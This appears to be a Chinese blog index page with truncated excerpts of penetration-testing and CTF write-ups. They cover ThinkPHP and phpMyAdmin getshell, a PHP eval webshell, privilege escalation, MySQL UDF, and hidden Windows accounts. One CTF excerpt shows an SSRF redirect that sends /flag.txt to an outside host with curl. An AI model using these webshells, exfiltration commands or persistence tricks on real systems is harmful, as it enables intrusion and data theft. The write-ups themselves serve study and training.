摘要:
外围打点 常规nmap扫端口 访问发现是ThinkPHP V5框架,访问任意路径触发404得到具体版本号为5.0.22 直接跑工具进行getshell 蚁剑连接 直接获得了域管理员用户的权限,然后进行内网信息搜集 内网渗透 通过ipconfig /all查看内网网卡 通过DNS服务器可知域控ip为1 阅读全文
摘要:
外围打点 nmap大概扫下全端口 2003端口有个phpMyAdmin,版本为4.8.1,存在文件包含漏洞! 通过执行select "<?php eval($_GET['a']);?>在session中写入一个马,然后通过该马写个一句话,payload如下: /index.php?target=db 阅读全文
摘要:
外围打点 nmap扫描服务 访问80端口web服务,dirsearch扫后台 [17:42:51] 200 - 92KB - /1.php [17:42:51] 200 - 0B - /2.php [17:42:52] 200 - 18KB - /LICENSE.txt [17:42:52] 200 阅读全文
摘要:
下边内容都是一些提权思路的整理,对于很多知识点并没有细化和深入,仅供个人参考,日后在实战中碰到了会深入学习并记录在新的文章中。 基础知识 权限组划分: Administrators:管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。 Power Users 阅读全文
摘要:
UDF提权 原理 UDF(user defined function)即用户自定义函数是Mysql的一个拓展接口,用户通过自定义函数可以实现在Mysql中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像version()函数一样。 用户可以通过自己增加函数对Mysql功能进行扩充,文 阅读全文
摘要:
隐藏用户 原理 在创建用户时,在用户名后添加一个$并修改注册表即可把该用户隐藏,只有在注册表中才能看到用户信息 复现过程 使用net user whoami$ Aa123456 /add添加一个用户,使用net users查看用户发现没有该用户,但是还是可以在计算机管理中查看到 这里我们紧接着将隐藏 阅读全文
摘要:
Web Mercy-code <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if ( 阅读全文
摘要:
MagicProxy ssrf重定向绕过 <?php header("Location:http://127.0.0.1:8080/admin?command=curl%20-F%20file=@/flag.txt%20http%3A%2F%2F82.157.174.226%3A8888"); ex 阅读全文
摘要:
popop 访问class.php 简单,直接exp <?php class s{ public $f; public function __construct() { $this->f = new T; } } class T{ public $f; public $s; public funct 阅读全文
摘要:
online_crt 通过以下点进行CRLF触发/admin/rename处修改crt文件名 经过本地多次测试获得payload uri=/admin%252Frename%3Foldname%3D4c9a3b84-f582-42e2-b1db-21d44c982eb6.crt%26newname% 阅读全文
摘要:
积分榜 Web SimpleRCE 非预期 盲读/flag,通过请求头传入参数绕过waf 预期 利用原生类! phpdest 原题:https://www.shawroot.cc/1917.html <?php highlight_file(__FILE__); require_once 'flag 阅读全文
摘要:
冬奥会 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is 阅读全文